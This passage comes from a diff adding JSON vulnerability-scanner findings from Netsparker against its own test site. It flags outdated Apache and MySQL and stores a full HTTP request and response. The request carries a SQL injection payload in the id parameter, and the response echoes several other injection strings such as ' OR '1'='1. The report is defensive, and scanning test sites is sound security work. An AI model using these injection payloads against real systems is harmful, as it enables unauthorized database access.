Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Improper Access Control Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + } + ], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Out-of-date Version (Apache)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n

    Please upgrade your installation of Apache to the latest stable version.

    \n
    ", + "RemedyReferences": "", + "Severity": "Critical", + "State": "Present", + "Type": "ApacheOutOfDate", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.8" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.4" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.4" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified you are using an out-of-date version of MySQL.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "5.0.51b" + }, + { + "Name": "Latest Version", + "Value": "8.0.25" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + } + ], + "FirstSeenDate": "16/06/2021 12:35 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "-1 OR 17-7=10", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nDate: Thu, 24 Jun 2021 22:51:27 GMT\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t

    Artist Service

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\t\t\t\t\t

    \n \n

    Results: -1 OR 17-7=10


    \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
    IDNameSURNAMECREATION DATE
    2 NICK WAHLBERG 2006-02-15 04:34:33
    3 ED CHASE 2006-02-15 04:34:33
    4 JENNIFER DAVIS 2006-02-15 04:34:33
    5 JOHNNY LOLLOBRIGIDA 2006-02-15 04:34:33
    6 BETTE NICHOLSON 2006-02-15 04:34:33
    7 GRACE MOSTEL 2006-02-15 04:34:33
    8 MATTHEW JOHANSSON 2006-02-15 04:34:33
    9 JOE SWANK 2006-02-15 04:34:33
    10 CHRISTIAN GABLE 2006-02-15 04:34:33
    11 ZERO CAGE 2006-02-15 04:34:33
    12 KARL BERRY 2006-02-15 04:34:33
    13 UMA WOOD 2006-02-15 04:34:33
    14 VIVIEN BERGEN 2006-02-15 04:34:33
    15 CUBA OLIVIER 2006-02-15 04:34:33
    16 FRED COSTNER 2012-03-13 12:14:54 22
    17 HELEN VOIGHT 2012-03-13 12:14:54 22
    18 DAN TORN 2012-03-13 12:14:54 22
    19 BOB FAWCETT 2012-03-13 12:14:54 22
    20 LUCILLE TRACY 2012-03-13 12:14:54 22
    21 KIRSTEN PALTROW 2012-03-13 12:14:54 22
    22 ELVIS MARX 2012-03-13 12:14:54 22
    23 SANDRA KILMER 2012-03-13 12:14:54 22
    24 CAMERON STREEP 2012-03-13 12:14:54 22
    25 KEVIN BLOOM 2012-03-13 12:14:54 22
    26 RIP CRAWFORD 2012-03-13 12:14:54 22
    27 JULIA MCQUEEN 2012-03-13 12:14:54 22
    28 WOODY HOFFMAN 2012-03-13 12:14:54 22
    29 ALEC WAYNE 2012-03-13 12:14:54 22
    30 SANDRA PECK 2012-03-13 12:14:54 22
    31 SISSY SOBIESKI 2012-03-13 12:14:54 22
    32 TIM HACKMAN 2012-03-13 12:14:54 22
    33 MILLA PECK 2012-03-13 12:14:54 22
    34 AUDREY OLIVIER 2012-03-13 12:14:54 22
    35 JUDY DEAN 2012-03-13 12:14:54 22
    36 BURT DUKAKIS 2012-03-13 12:14:54 22
    37 VAL BOLGER 2012-03-13 12:14:54 22
    38 TOM MCKELLEN 2012-03-13 12:14:54 22
    39 GOLDIE BRODY 2012-03-13 12:14:54 22
    40 JOHNNY CAGE 2012-03-13 12:14:54 22
    41 JODIE DEGENERES 2012-03-13 12:14:54 22
    42 TOM MIRANDA 2012-03-13 12:14:54 22
    43 KIRK JOVOVICH 2012-03-13 12:14:54 22
    44 NICK STALLONE 2012-03-13 12:14:54 22
    45 REESE KILMER 2012-03-13 12:14:54 22
    46 PARKER GOLDBERG 2012-03-13 12:14:54 22
    47 JULIA BARRYMORE 2012-03-13 12:14:54 22
    48 FRANCES DAY-LEWIS 2012-03-13 12:14:54 22
    49 ANNE CRONYN 2012-03-13 12:14:54 22
    50 NATALIE HOPKINS 2012-03-13 12:14:54 22
    51 GARY PHOENIX 2012-03-13 12:14:54 22
    52 CARMEN HUNT 2012-03-13 12:14:54 22
    53 MENA TEMPLE 2012-03-13 12:14:54 22
    54 PENELOPE PINKETT 2012-03-13 12:14:54 22
    55 FAY KILMER 2012-03-13 12:14:54 22
    56 DAN HARRIS 2012-03-13 12:14:54 22
    57 JUDE CRUISE 2012-03-13 12:14:54 22
    58 CHRISTIAN AKROYD 2012-03-13 12:14:54 22
    59 DUSTIN TAUTOU 2012-03-13 12:14:54 22
    60 HENRY BERRY 2012-03-13 12:14:54 22
    61 CHRISTIAN NEESON 2012-03-13 12:14:54 22
    62 JAYNE NEESON 2012-03-13 12:14:54 22
    63 CAMERON WRAY 2012-03-13 12:14:54 22
    64 RAY JOHANSSON 2012-03-13 12:14:54 22
    65 ANGELA HUDSON 2012-03-13 12:14:54 22
    66 MARY TANDY 2012-03-13 12:14:54 22
    67 JESSICA BAILEY 2012-03-13 12:14:54 22
    68 RIP WINSLET 2012-03-13 12:14:54 22
    69 KENNETH PALTROW 2012-03-13 12:14:54 22
    70 MICHELLE MCCONAUGHEY 2012-03-13 12:14:54 22
    71 ADAM GRANT 2012-03-13 12:14:54 22
    72 SEAN WILLIAMS 2012-03-13 12:14:54 22
    73 GARY PENN 2012-03-13 12:14:54 22
    74 MILLA KEITEL 2012-03-13 12:14:54 22
    75 BURT POSEY 2012-03-13 12:14:54 22
    76 ANGELINA ASTAIRE 2012-03-13 12:14:54 22
    77 CARY MCCONAUGHEY 2012-03-13 12:14:54 22
    78 GROUCHO SINATRA 2012-03-13 12:14:54 22
    79 MAE HOFFMAN 2012-03-13 12:14:54 22
    80 RALPH CRUZ 2012-03-13 12:14:54 22
    81 SCARLETT DAMON 2012-03-13 12:14:54 22
    82 WOODY JOLIE 2012-03-13 12:14:54 22
    83 BEN WILLIS 2012-03-13 12:14:54 22
    84 JAMES PITT 2012-03-13 12:14:54 22
    85 MINNIE ZELLWEGER 2012-03-13 12:14:54 22
    86 GREG CHAPLIN 2012-03-13 12:14:54 22
    87 SPENCER PECK 2012-03-13 12:14:54 22
    88 KENNETH PESCI 2012-03-13 12:14:54 22
    89 CHARLIZE DENCH 2012-03-13 12:14:54 22
    90 SEAN GUINESS 2012-03-13 12:14:54 22
    91 CHRISTOPHER BERRY 2012-03-13 12:14:54 22
    92 KIRSTEN AKROYD 2012-03-13 12:14:54 22
    93 ELLEN PRESLEY 2012-03-13 12:14:54 22
    94 KENNETH TORN 2012-03-13 12:14:54 22
    95 DARYL WAHLBERG 2012-03-13 12:14:54 22
    96 GENE WILLIS 2012-03-13 12:14:54 22
    97 MEG HAWKE 2012-03-13 12:14:54 22
    98 CHRIS BRIDGES 2012-03-13 12:14:54 22
    99 JIM MOSTEL 2012-03-13 12:14:54 22
    100 SPENCER DEPP 2012-03-13 12:14:54 22
    101 SUSAN DAVIS 2012-03-13 12:14:54 22
    102 WALTER TORN 2012-03-13 12:14:54 22
    103 MATTHEW LEIGH 2012-03-13 12:14:54 22
    104 PENELOPE CRONYN 2012-03-13 12:14:54 22
    105 SIDNEY CROWE 2012-03-13 12:14:54 22
    106 GROUCHO DUNST 2012-03-13 12:14:54 22
    107 GINA DEGENERES 2012-03-13 12:14:54 22
    108 WARREN NOLTE 2012-03-13 12:14:54 22
    109 SYLVESTER DERN 2012-03-13 12:14:54 22
    110 SUSAN DAVIS 2012-03-13 12:14:54 22
    111 CAMERON ZELLWEGER 2012-03-13 12:14:54 22
    112 RUSSELL BACALL 2012-03-13 12:14:54 22
    113 MORGAN HOPKINS 2012-03-13 12:14:54 22
    114 MORGAN MCDORMAND 2012-03-13 12:14:54 22
    115 HARRISON BALE 2012-03-13 12:14:54 22
    116 DAN STREEP 2012-03-13 12:14:54 22
    117 RENEE TRACY 2012-03-13 12:14:54 22
    118 CUBA ALLEN 2012-03-13 12:14:54 22
    119 WARREN JACKMAN 2012-03-13 12:14:54 22
    120 PENELOPE MONROE 2012-03-13 12:14:54 22
    121 LIZA BERGMAN 2012-03-13 12:14:54 22
    122 SALMA NOLTE 2012-03-13 12:14:54 22
    123 JULIANNE DENCH 2012-03-13 12:14:54 22
    124 SCARLETT BENING 2012-03-13 12:14:54 22
    125 ALBERT NOLTE 2012-03-13 12:14:54 22
    126 FRANCES TOMEI 2012-03-13 12:14:54 22
    127 KEVIN GARLAND 2012-03-13 12:14:54 22
    128 CATE MCQUEEN 2012-03-13 12:14:54 22
    129 DARYL CRAWFORD 2012-03-13 12:14:54 22
    130 GRETA KEITEL 2012-03-13 12:14:54 22
    131 JANE JACKMAN 2012-03-13 12:14:54 22
    132 ADAM HOPPER 2012-03-13 12:14:54 22
    133 RICHARD PENN 2012-03-13 12:14:54 22
    134 GENE HOPKINS 2012-03-13 12:14:54 22
    135 RITA REYNOLDS 2012-03-13 12:14:54 22
    136 ED MANSFIELD 2012-03-13 12:14:54 22
    137 MORGAN WILLIAMS 2012-03-13 12:14:54 22
    138 LUCILLE DEE 2012-03-13 12:14:54 22
    139 EWAN GOODING 2012-03-13 12:14:54 22
    140 WHOOPI HURT 2012-03-13 12:14:54 22
    141 CATE HARRIS 2012-03-13 12:14:54 22
    142 JADA RYDER 2012-03-13 12:14:54 22
    143 RIVER DEAN 2012-03-13 12:14:54 22
    144 ANGELA WITHERSPOON 2012-03-13 12:14:54 22
    145 KIM ALLEN 2012-03-13 12:14:54 22
    146 ALBERT JOHANSSON 2012-03-13 12:14:54 22
    147 FAY WINSLET 2012-03-13 12:14:54 22
    148 EMILY DEE 2012-03-13 12:14:54 22
    149 RUSSELL TEMPLE 2012-03-13 12:14:54 22
    150 JAYNE NOLTE 2012-03-13 12:14:54 22
    151 GEOFFREY HESTON 2012-03-13 12:14:54 22
    152 BEN HARRIS 2012-03-13 12:14:54 22
    153 MINNIE KILMER 2012-03-13 12:14:54 22
    154 MERYL GIBSON 2012-03-13 12:14:54 22
    155 IAN TANDY 2012-03-13 12:14:54 22
    156 FAY WOOD 2012-03-13 12:14:54 22
    157 GRETA MALDEN 2012-03-13 12:14:54 22
    158 VIVIEN BASINGER 2012-03-13 12:14:54 22
    159 LAURA BRODY 2012-03-13 12:14:54 22
    160 CHRIS DEPP 2012-03-13 12:14:54 22
    161 HARVEY HOPE 2012-03-13 12:14:54 22
    162 OPRAH KILMER 2012-03-13 12:14:54 22
    163 CHRISTOPHER WEST 2012-03-13 12:14:54 22
    164 HUMPHREY WILLIS 2012-03-13 12:14:54 22
    165 AL GARLAND 2012-03-13 12:14:54 22
    166 NICK DEGENERES 2012-03-13 12:14:54 22
    167 LAURENCE BULLOCK 2012-03-13 12:14:54 22
    168 WILL WILSON 2012-03-13 12:14:54 22
    169 KENNETH HOFFMAN 2012-03-13 12:14:54 22
    170 MENA HOPPER 2012-03-13 12:14:54 22
    171 OLYMPIA PFEIFFER 2012-03-13 12:14:54 22
    172 GROUCHO WILLIAMS 2012-03-13 12:14:54 22
    173 ALAN DREYFUSS 2012-03-13 12:14:54 22
    174 MICHAEL BENING 2012-03-13 12:14:54 22
    175 WILLIAM HACKMAN 2012-03-13 12:14:54 22
    176 JON CHASE 2012-03-13 12:14:54 22
    177 GENE MCKELLEN 2012-03-13 12:14:54 22
    178 LISA MONROE 2012-03-13 12:14:54 22
    179 ED GUINESS 2012-03-13 12:14:54 22
    180 JEFF SILVERSTONE 2012-03-13 12:14:54 22
    181 MATTHEW CARREY 2012-03-13 12:14:54 22
    182 DEBBIE AKROYD 2012-03-13 12:14:54 22
    183 RUSSELL CLOSE 2012-03-13 12:14:54 22
    184 HUMPHREY GARLAND 2012-03-13 12:14:54 22
    185 MICHAEL BOLGER 2012-03-13 12:14:54 22
    186 JULIA ZELLWEGER 2012-03-13 12:14:54 22
    187 RENEE BALL 2012-03-13 12:14:54 22
    188 ROCK DUKAKIS 2012-03-13 12:14:54 22
    189 CUBA BIRCH 2012-03-13 12:14:54 22
    190 AUDREY BAILEY 2012-03-13 12:14:54 22
    191 GREGORY GOODING 2012-03-13 12:14:54 22
    192 JOHN SUVARI 2012-03-13 12:14:54 22
    193 BURT TEMPLE 2012-03-13 12:14:54 22
    194 MERYL ALLEN 2012-03-13 12:14:54 22
    195 JAYNE SILVERSTONE 2012-03-13 12:14:54 22
    196 BELA WALKEN 2012-03-13 12:14:54 22
    197 REESE WEST 2012-03-13 12:14:54 22
    198 MARY KEITEL 2012-03-13 12:14:54 22
    199 JULIA FAWCETT 2012-03-13 12:14:54 22
    200 THORA TEMPLE 2012-03-13 12:14:54 22
    412 -1 OR 1=1 test 2012-03-13 12:14:54 22
    413 -1 OR 1=1 test 2012-03-13 12:14:54 22
    414 NS1NO test 2012-03-13 12:14:54 22
    415 1 AND 'NS='ss test 2012-03-13 12:14:54 22
    416 ' OR 'ns'='ns test 2012-03-13 12:14:54 22
    417 -1 OR 17-7=10 test 2012-03-13 12:14:54 22
    418 1 OR X='ss test 2012-03-13 12:14:54 22
    419 ' OR '1'='1 test 2012-03-13 12:14:54 22
    420 ' OR '1'='1 test 2012-03-13 12:14:54 22

    \n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      netsparker xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \n\n
    \n\tThis website is automatically reset at every midnight (00:00 - UTC).\n
    \n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 180.5509, + "StatusCode": 200 + }, + "LookupId": "b89d9038-b732-471a-657c-ad49020ee0ad", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Use of a Broken or Risky Cryptographic Algorithm Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Low", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "MySQL Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": 